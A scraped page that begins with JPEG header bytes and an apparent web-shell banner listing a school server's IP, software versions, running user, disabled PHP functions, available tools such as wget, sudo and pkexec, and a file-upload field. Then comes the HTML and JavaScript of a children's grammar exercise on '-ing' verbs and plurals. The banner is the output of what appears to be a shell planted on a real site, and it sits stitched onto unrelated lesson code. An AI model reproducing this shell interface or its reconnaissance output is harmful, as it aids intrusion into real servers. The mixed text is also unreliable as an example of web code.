????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 3.141.33.133 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/apps/school/www_old8/Html/LevelE/Category1/ |
Upload File : |
<!doctype html> <html> <head> <title>Grammer skills and underline the correct words</title> <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script> <script> function page_preLoad() { shared_setDeviceTypeLevelCategoryLastLesson(Level.E, Category.No1); shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta'); shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.E, Category.No1, 49), true, true); shared_setFooterTable('id_tblFooter', true, true, true, true, true); var ids_headings = ['id_td_heading1', 'id_td_heading2', 'id_td_heading3']; var ids_boxes = ['id_dropbox_walking', 'id_dropbox_playing', 'id_dropbox_doing', 'id_dropbox_cooking', 'id_dropbox_watching']; var ids_texts = new Array(); for (var textId = 1; textId <= 47; textId++) { ids_texts.push('id_td_text' + textId); } var ids_tds = ['id_td_textDoing', 'id_td_textCooking', 'id_td_textPlaying', 'id_td_textWatching', 'id_td_textWalking']; var ids_spans = ['id_span_textDoing', 'id_span_textCooking', 'id_span_textPlaying', 'id_span_textWatching', 'id_span_texWalking']; var ids_All = ids_headings.concat(ids_tds, ids_texts, ids_boxes); shared_adjust_fontSize_for_ids_all_devices(ids_All, 70); shared_adjust_fontSize_for_ids_all_devices(['id_suffix_text'], 60); shared_init_dropBox_tds_withOUT_drag_here(ids_boxes); shared_init_dropping_spans(ids_spans); var id_tables_array = ['id_table1', 'id_table2']; shared_border_collapse_for_tables_except_android(id_tables_array); set_tds_isUnderscore_to_false(); } function page_onLoad() { } function set_tds_isUnderscore_to_false() { var ids_underscore_tds = ['id_td_text19', 'id_td_text21', 'id_td_text24', 'id_td_text26', 'id_td_text29', 'id_td_text31', 'id_td_text34', 'id_td_text36', 'id_td_text39', 'id_td_text41']; for (var index = 0; index < ids_underscore_tds.length; index++) { var eText = document.getElementById(ids_underscore_tds[index]); eText.isUnderlined = false; } } function btnHome_click() { shared_btnHomeCategories_click('LevelE'); } function btnPrevious_click() { window.location = 'LevelECat1Lesson48.html'; } function btnNext_click() { window.location = 'LevelECat1Lesson50.html'; } function add_or_remove_underline(id_text) { var eText = document.getElementById(id_text); var text = eText.innerText; if (eText.isUnderlined) { eText.isUnderlined = false; eText.innerHTML = text; eText.style.color = 'black'; eText.style.backgroundColor = 'transparent'; } else { eText.isUnderlined = true; eText.innerHTML = '<u>' + text + '</u>'; eText.style.color = 'black'; eText.style.backgroundColor = 'transparent'; } } function DragDrop(id_dropBox, ids_array) { if (shared_isMovingElementIdInTheArraySetIsFilledTrue(id_dropBox, ids_array)) { shared_setTextAndBackgroundColorToGreenAndIsMovedTrue(shared_currentDropingId, id_dropBox); shared_set_currentDropingId_draggbleToFalse(); } else { shared_resetCurrentDroppingPosition(id_dropBox); } } function btnValidate_click() { var ids_boxes = ['id_dropbox_walking', 'id_dropbox_playing', 'id_dropbox_doing', 'id_dropbox_cooking', 'id_dropbox_watching']; var ids_undreline_required_tds = ['id_td_text21', 'id_td_text26', 'id_td_text29', 'id_td_text36', 'id_td_text39']; var ids_undreline_not_required_tds = ['id_td_text19', 'id_td_text24', 'id_td_text31', 'id_td_text34', 'id_td_text41']; var isAllBoxesFilled = shared_isAllInfosFilled(ids_boxes); var isAllRequiredTdsUnderlined = shared_isAllTdsText_underlined(ids_undreline_required_tds); var isAllNotRequiredTdsUnderlined = shared_isAllTdsText_underlined(ids_undreline_not_required_tds); set_underline_tds_backgroundColor(ids_undreline_not_required_tds, ids_undreline_required_tds); if ((isAllBoxesFilled == true) && (isAllRequiredTdsUnderlined == true) && (isAllNotRequiredTdsUnderlined == false)) { shared_is_all_infos_filled_show_claps_animationWithIsFilled(ids_boxes); } } function shared_isAllTdsText_underlined(tdIdsArray) { for (index = 0; index < tdIdsArray.length; index++) { var element = document.getElementById(tdIdsArray[index]); if (element.isUnderlined) { return (true); } } return (false); } function set_underline_tds_backgroundColor(ids_undreline_not_required_tds, ids_undreline_required_tds) { for (var index = 0; index < ids_undreline_not_required_tds.length; index++) { var element = document.getElementById(ids_undreline_not_required_tds[index]); if (element.isUnderlined == true) { element.style.backgroundColor = shared_colorLightRed; element.style.color = 'white'; } else { element.style.backgroundColor = 'transparent'; element.style.color = 'black'; } } for (var index = 0; index < ids_undreline_required_tds.length; index++) { var element = document.getElementById(ids_undreline_required_tds[index]); if (element.isUnderlined == true) { element.style.backgroundColor = 'green'; element.style.color = 'white'; } else { element.style.backgroundColor = 'transparent'; element.style.color = 'black'; } } } </script> </head> <body onload="page_onLoad()"> <div id="shared_id_div_claps_image"> </div> <table id="id_tblMainiPadBody" border="1px" cellspacing="0" cellpadding="0"> <tr height="8%"> <td> <div id="id_tblHeader"></div> </td> </tr> <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device --> <td> <table width="100%" height="100%" border="0" cellpadding="2%" cellspacing="0"> <tr height="50%"> <td style="padding-bottom:0px"> <table id="id_table1" width="100%" height="100%" border="1" cellpadding="0" cellspacing="0"> <tr height="15%"> <td id="id_td_heading1" class="shared_style_black_24px_bold_padding_left_2_percent">Grammer skills:<br>We use the <span style="color:red">"ing"</span> when we use <span style="color:red">'am, is, are</span>.</td> </tr> <tr height="15%"> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr height="50%"> <td id="id_td_heading2" width="*" class="shared_style_blue_24px_bold_padding_left_2_percent">Options:</td> <td id="id_td_textCooking" class="shared_style_red_24px_bold"width="25%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_textCooking">cooking</span> </td> <td id="id_td_textPlaying" class="shared_style_red_24px_bold"width="25%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_textPlaying">playing</span> </td> <td id="id_td_textDoing" class="shared_style_red_24px_bold" width="25%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_textDoing">doing</span> </td> </tr> <tr height="*"> <td id="id_td_text1" width="*"> </td> <td id="id_td_textWalking" class="shared_style_red_24px_bold" width="25%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_texWalking">walking</span> </td> <td id="id_td_textWatching" class="shared_style_red_24px_bold" width="25%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_textWatching">watching</span> </td> <td id="id_td_text2" width="25%"> </td> </tr> </table> </td> </tr> <tr height="*"> <td style="border-bottom:none"> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="2%"> <tr id="id_tr_dropbox_walking" height="20%" ondragover="shared_highlight('id_dropbox_walking'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_dropbox_walking')" ondrop="DragDrop('id_dropbox_walking', ['id_span_texWalking'])"> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="2%"> <tr> <td id="id_td_text3" class="shared_style_black_24px_bold" width="10%" align="right">1.</td> <td id="id_td_text4" class="shared_style_black_24px_bold" width="18%"> The boy is</td> <td id="id_dropbox_walking" class="shared_style_red_24px_bold" width="20%" align="center">______</td> <td id="id_td_text5" class="shared_style_black_24px_bold" width="*"> (walk).</td> </tr> </table> </td> </tr> <tr id="id_tr_dropbox_playing" height="20%" ondragover="shared_highlight('id_dropbox_playing'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_dropbox_playing')" ondrop="DragDrop('id_dropbox_playing', ['id_span_textPlaying'])"> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="2%"> <tr> <td id="id_td_text6" class="shared_style_black_24px_bold" width="10%" align="right">2.</td> <td id="id_td_text7" class="shared_style_black_24px_bold" width="15%"> Rohit is</td> <td id="id_dropbox_playing" class="shared_style_red_24px_bold" width="20%" align="center">______</td> <td id="id_td_text8" class="shared_style_black_24px_bold" width="*"> (play) football.</td> </tr> </table> </td> </tr> <tr id="id_tr_dropbox_doing" height="20%" ondragover="shared_highlight('id_dropbox_doing'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_dropbox_doing')" ondrop="DragDrop('id_dropbox_doing', ['id_span_textDoing'])"> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="2%"> <tr> <td id="id_td_text9" class="shared_style_black_24px_bold" width="10%" align="right">3.</td> <td id="id_td_text10" class="shared_style_black_24px_bold" width="23%"> The boys are</td> <td id="id_dropbox_doing" class="shared_style_red_24px_bold" width="20%" align="center">______</td> <td id="id_td_text11" class="shared_style_black_24px_bold" width="*"> (do) their home work.</td> </tr> </table> </td> </tr> <tr id="id_tr_dropbox_cooking" height="20%" ondragover="shared_highlight('id_dropbox_cooking'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_dropbox_cooking')" ondrop="DragDrop('id_dropbox_cooking', ['id_span_textCooking'])"> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="2%"> <tr> <td id="id_td_text12" class="shared_style_black_24px_bold" width="10%" align="right">4.</td> <td id="id_td_text13" class="shared_style_black_24px_bold" width="24%"> My mother is</td> <td id="id_dropbox_cooking" class="shared_style_red_24px_bold" width="20%" align="center">______</td> <td id="id_td_text14" class="shared_style_black_24px_bold" width="*"> (cook) in the kitchen.</td> </tr> </table> </td> </tr> <tr id="id_tr_dropbox_watching" height="*" ondragover="shared_highlight('id_dropbox_watching'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_dropbox_watching')" ondrop="DragDrop('id_dropbox_watching', ['id_span_textWatching'])"> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="2%"> <tr> <td id="id_td_text15" class="shared_style_black_24px_bold" width="10%" align="right">5.</td> <td id="id_td_text16" class="shared_style_black_24px_bold" width="28%"> The children are</td> <td id="id_dropbox_watching" class="shared_style_red_24px_bold" width="20%" align="center">______</td> <td id="id_td_text17" class="shared_style_black_24px_bold" width="*"> (watch) televison.</td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="*"> <td> <table id="id_table2" width="100%" height="100%" border="1" cellpadding="0" cellspacing="0"> <tr height="20%"> <td id="id_td_heading3" width="*" class="shared_style_black_24px_bold_padding_left_2_percent">Underline the correct word in the brackets.<br> [<span id="id_suffix_text" style="color:blue">Click 1 time to show underline and click 2 times to hide underline<br> on words in bracket</span>] </td> </tr> <tr height="*"> <td style="padding-left:6%"> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="2%"> <tr height="20%"> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td id="id_td_text18" class="shared_style_black_24px_bold_padding_left_2_percent" width="46%">1. There are many coconut</td> <td id="id_td_text43" class="shared_style_black_24px_bold_padding_left_2_percent" width="3%">( </td> <td id="id_td_text19" class="shared_style_black_24px_bold" width="12%" align="center" onClick="add_or_remove_underline('id_td_text19')">tree</td> <td id="id_td_text20" class="shared_style_black_24px_bold" width="3%" align="center">/</td> <td id="id_td_text21" class="shared_style_black_24px_bold" width="12%" align="center" onClick="add_or_remove_underline('id_td_text21')">trees</td> <td id="id_td_text22" class="shared_style_black_24px_bold" width="*"> ).</td> </tr> </table> </td> </tr> <tr height="20%"> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td id="id_td_text23" class="shared_style_black_24px_bold_padding_left_2_percent" width="29%">2. Pearl has two</td> <td id="id_td_text44" class="shared_style_black_24px_bold_padding_left_2_percent" width="3%">( </td> <td id="id_td_text24" class="shared_style_black_24px_bold" width="15%" align="center" onClick="add_or_remove_underline('id_td_text24')">brother</td> <td id="id_td_text25" class="shared_style_black_24px_bold" width="3%" align="center">/</td> <td id="id_td_text26" class="shared_style_black_24px_bold" width="15%" align="center" onClick="add_or_remove_underline('id_td_text26')">brothers</td> <td id="id_td_text27" class="shared_style_black_24px_bold" width="*"> ).</td> </tr> </table> </td> </tr> <tr height="20%"> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td id="id_td_text28" class="shared_style_black_24px_bold_padding_left_2_percent" width="26%">3. It is my little</td> <td id="id_td_text45" class="shared_style_black_24px_bold_padding_left_2_percent" width="3%">( </td> <td id="id_td_text29" class="shared_style_black_24px_bold" width="15%" align="center" onClick="add_or_remove_underline('id_td_text29')">finger</td> <td id="id_td_text30" class="shared_style_black_24px_bold" width="3%" align="center">/</td> <td id="id_td_text31" class="shared_style_black_24px_bold" width="15%" align="center" onClick="add_or_remove_underline('id_td_text31')">fingers</td> <td id="id_td_text32" class="shared_style_black_24px_bold" width="*"> ).</td> </tr> </table> </td> </tr> <tr height="20%"> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td id="id_td_text33" class="shared_style_black_24px_bold_padding_left_2_percent" width="33%">4. There are seven</td> <td id="id_td_text46" class="shared_style_black_24px_bold_padding_left_2_percent" width="3%">( </td> <td id="id_td_text34" class="shared_style_black_24px_bold" width="10%" align="center" onClick="add_or_remove_underline('id_td_text34')">day</td> <td id="id_td_text35" class="shared_style_black_24px_bold" width="3%" align="center">/</td> <td id="id_td_text36" class="shared_style_black_24px_bold" width="12%" align="center" onClick="add_or_remove_underline('id_td_text36')">days</td> <td id="id_td_text37" class="shared_style_black_24px_bold" width="*"> ) in a week.</td> </tr> </table> </td> </tr> <tr height="*"> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td id="id_td_text38" class="shared_style_black_24px_bold_padding_left_2_percent" width="29%">5. My sister is a</td> <td id="id_td_text47" class="shared_style_black_24px_bold_padding_left_2_percent" width="3%">( </td> <td id="id_td_text39" class="shared_style_black_24px_bold" width="15%" align="center" onClick="add_or_remove_underline('id_td_text39')">doctor</td> <td id="id_td_text40" class="shared_style_black_24px_bold" width="3%" align="center">/</td> <td id="id_td_text41" class="shared_style_black_24px_bold" width="15%" align="center" onClick="add_or_remove_underline('id_td_text41')">doctors</td> <td id="id_td_text42" class="shared_style_black_24px_bold" width="*"> ).</td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="8%"> <td> <div id="id_tblFooter"></div> </td> </tr> </table> <script> page_preLoad(); new webkit_draggable('id_span_textDoing', {handle : 'id_td_textDoing', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_span_textCooking', {handle : 'id_td_textCooking', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_span_textPlaying', {handle : 'id_td_textPlaying', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_span_textWatching', {handle : 'id_td_textWatching', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_span_texWalking', {handle : 'id_td_textWalking', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); webkit_drop.add('id_tr_dropbox_doing', {onOver : function(){shared_highlight('id_dropbox_doing')}, onOut : function(){shared_un_highlight('id_dropbox_doing')}, onDrop : function(){DragDrop('id_dropbox_doing', ['id_span_textDoing'])}}); webkit_drop.add('id_tr_dropbox_cooking', {onOver : function(){shared_highlight('id_dropbox_cooking')}, onOut : function(){shared_un_highlight('id_dropbox_cooking')}, onDrop : function(){DragDrop('id_dropbox_cooking', ['id_span_textCooking'])}}); webkit_drop.add('id_tr_dropbox_playing', {onOver : function(){shared_highlight('id_dropbox_playing')}, onOut : function(){shared_un_highlight('id_dropbox_playing')}, onDrop : function(){DragDrop('id_dropbox_playing', ['id_span_textPlaying'])}}); webkit_drop.add('id_tr_dropbox_watching', {onOver : function(){shared_highlight('id_dropbox_watching')}, onOut : function(){shared_un_highlight('id_dropbox_watching')}, onDrop : function(){DragDrop('id_dropbox_watching', ['id_span_textWatching'])}}); webkit_drop.add('id_tr_dropbox_walking', {onOver : function(){shared_highlight('id_dropbox_walking')}, onOut : function(){shared_un_highlight('id_dropbox_walking')}, onDrop : function(){DragDrop('id_dropbox_walking', ['id_span_texWalking'])}}); </script> </body> </html>